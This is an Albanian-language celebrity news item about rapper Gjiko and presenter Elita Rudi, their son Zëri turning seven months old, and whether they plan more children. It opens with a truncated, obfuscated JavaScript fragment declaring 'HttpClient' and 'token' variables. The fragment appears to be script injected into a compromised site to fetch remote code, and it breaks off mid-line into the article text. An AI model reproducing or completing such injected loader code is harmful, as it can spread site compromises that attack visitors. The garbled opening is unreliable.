;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zëri mbushi shtatë muaj dhe mami Elita flet për planet për ta rritur familjen

By

Reperi Gjiko dhe moderatorja Elita Rudi janë prindër të një vogëlushi shumë simpatik që e quajnë Zëri.

Dyshja shumë shpesh ndajnë imazhe të familjes të tyre të vogël, ku shfaqen gjithnjë të lumtur me Elitën si një nënë shumë e kujdesshme dhe Gjiko ai babi tipik që ngacmon të birin e tij gjithnjë.

Zëri vetëm dje mbushi 7 muaj, ku Elita ndau në llogarinë e saj në Instagram disa foto të vogëlushit të saj duke shkruar, ‘Më lër të të dua pak më shumë para se ti nuk do të jesh më i vogël. Urime muajin e 7-te i vogli im.’

Elita po ashtu kishte nisur një sesion pyetjesh dhe përgjigjesh në Instagram, ku ndjekësit e saj kishin mundësinë ta pyesnin për gjithçka që u vinte në mendje. Atëherë, natyrisht që kureshtja e ndjekësve të saj është e madhe për të ditur nëse dyshja planifikojnë të bëhen prindër sërish.

Një pyetje e tillë u bë dhe Elita u përgjigj se nuk planifikonte të bëhej nënë sërish së shpejti.

Nga ana tjetër në korrik, i ftuar në Nd’rrimin e Natës, Gjiko u pyet nga nikoqiri Alaudin Hamiti, se sa fëmijë do nga martesa me Elitën, ai është shprehur se i do tre! /Prive.al

Artikuj të ngjashëm